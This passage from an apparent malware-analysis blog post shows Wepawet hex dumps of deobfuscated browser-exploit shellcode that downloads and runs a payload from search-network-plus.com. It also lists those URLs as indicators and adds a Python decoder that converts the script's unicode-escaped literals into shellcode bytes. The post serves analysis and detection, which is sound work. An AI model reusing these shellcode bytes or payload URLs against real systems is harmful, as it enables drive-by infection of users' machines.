..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://search-ne
twork-plus.com/l
oad.php?a=a&st=I
nternet Explorer
 6.0&e=2..%.0.%.
0.%.0.%.0.%.0.%.
0.
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 73  65 61 72 63 68 2d 6e 65 
74 77 6f 72 6b 2d 70 6c  75 73 2e 63 6f 6d 2f 6c 
6f 61 64 2e 70 68 70 3f  61 3d 61 26 73 74 3d 49 
6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72 
20 36 2e 30 26 65 3d 33  00 00 34 13 34 13 
................
................
................
................
................
................
................
................
................
................
3.d.@0x..@..p...
X....@4.@|.X
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://search-ne
twork-plus.com/l
oad.php?a=a&st=I
nternet Explorer
 6.0&e=3..4.4.
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 73  65 61 72 63 68 2d 6e 65 
74 77 6f 72 6b 2d 70 6c  75 73 2e 63 6f 6d 2f 6c 
6f 61 64 2e 70 68 70 3f  61 3d 61 26 73 74 3d 49 
6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72 
20 36 2e 30 26 65 3d 31  00 00 00 00 23 00 26 00 
23 00 26 00 23 00 26 00  23 00 26 00 23 00 26 00 
23 00 26 00 23 00 26 00  23 00 26 00 23 00 26 00 
23 00 26 00 
3.d.@0x..@..p...
X....@4.@|.X
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://search-ne
twork-plus.com/l
oad.php?a=a&st=I
nternet Explorer
 6.0&e=1....#.&.
#.&.#.&.#.&.#.&.
#.&.#.&.#.&.#.&.
#.&.

Additional (potential) malware:

URL                                                                       | Type | Hash | Analysis
------------------------------------------------------------------------- | ---- | ---- | --------
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1  | N/A  | N/A  |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2  | N/A  | N/A  |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3  | N/A  | N/A  |

DING-DING-DING! JACKPOT!!!

We got the deobfuscated shellcode and payload URLs. That's pretty much everything we need for now. Of course, you should also review what files and registry entries were created and investigate the service apparently created by the malware (remember that svchost.exe?), but that is pretty straightforward using Volatility and you can figure it out yourself.
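One thing worth understanding from the Wepawet output is how the `sly("\uC033\u8B64...")` literals in the script (where `sly` is `unescape`) turn into the hex dump: each `\uXXXX` is one 16-bit code unit, laid out little-endian in memory, so `\uC033` becomes the bytes `33 c0`, and the `%25%30` tail is expanded by `unescape()` into the characters `%` and `0`, which become `25 00 30 00`. The following decoder is an example added here (not Wepawet's code and not from the post) that performs that conversion statically and pulls the embedded download URL out of the result; it is fed a constructed excerpt of the XiIHG literal quoted above (the first eight code units plus the URL tail) and the `%XX` tail of the bSuTN literal. It assumes no escape itself produces a `%`, which is true for the literals on this page.

```python
import re

# Constructed excerpt of the sly("...") literal from the XiIHG branch quoted above: the first
# eight code units, then the tail that holds the download URL. The full literal is on the page.
SHELLCODE_LITERAL = (
    r"\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD"
    r"\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F"
    r"\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70"
    r"\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334"
)
# Tail of the bSuTN literal, which pads with unescape()-style %XX sequences instead.
PADDING_LITERAL = r"\u6526\u323D\u0000%25%30%25%30"

# One token per \uXXXX (JS parser), %uXXXX or %XX (unescape), or any other single character.
TOKEN_RE = re.compile(r"\\u([0-9A-Fa-f]{4})|%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)
URL_RE = re.compile(rb"https?://[\x21-\x7e ]+?(?=\x00)")


def js_literal_to_units(literal):
    """Turn a JS string literal body, after unescape(), into a list of UTF-16 code units.

    Single pass: assumes no \\u escape yields a '%' that unescape() would then consume.
    """
    units = []
    for m in TOKEN_RE.finditer(literal):
        if m.group(1) is not None:
            units.append(int(m.group(1), 16))
        elif m.group(2) is not None:
            units.append(int(m.group(2), 16))
        elif m.group(3) is not None:
            units.append(int(m.group(3), 16))
        else:
            units.append(ord(m.group(4)))
    return units


def units_to_bytes(units):
    """Lay the code units out as the JS engine does in memory: 16-bit little-endian."""
    return b"".join(u.to_bytes(2, "little") for u in units)


def embedded_urls(blob):
    """NUL-terminated URLs inside the decoded bytes (the shellcode stores its URL that way)."""
    return [m.group().decode("ascii") for m in URL_RE.finditer(blob)]


def hexdump(blob, width=16):
    """Same layout as the Wepawet listing above: hex bytes on the left, ASCII on the right."""
    lines = []
    for i in range(0, len(blob), width):
        chunk = blob[i:i + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in chunk)
        lines.append(f"{hexpart:<{width * 3}} {asc}")
    return "\n".join(lines)


if __name__ == "__main__":
    blob = units_to_bytes(js_literal_to_units(SHELLCODE_LITERAL))
    print(hexdump(blob))
    print(embedded_urls(blob))
    print(hexdump(units_to_bytes(js_literal_to_units(PADDING_LITERAL))))
```

Paste the full literal of each branch in place of the excerpt and you get the three dumps Wepawet produced, with `e=1`, `e=2` and `e=3` in the URL being the only difference between the three shellcode copies. The `33 c0 64 8b 40 30` opening (`xor eax,eax; mov eax,fs:[eax+0x30]`) is the usual PEB walk used to locate kernel32, which is a good string to keep in your detection notes.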

Hope this was an amusing story or at least helpful.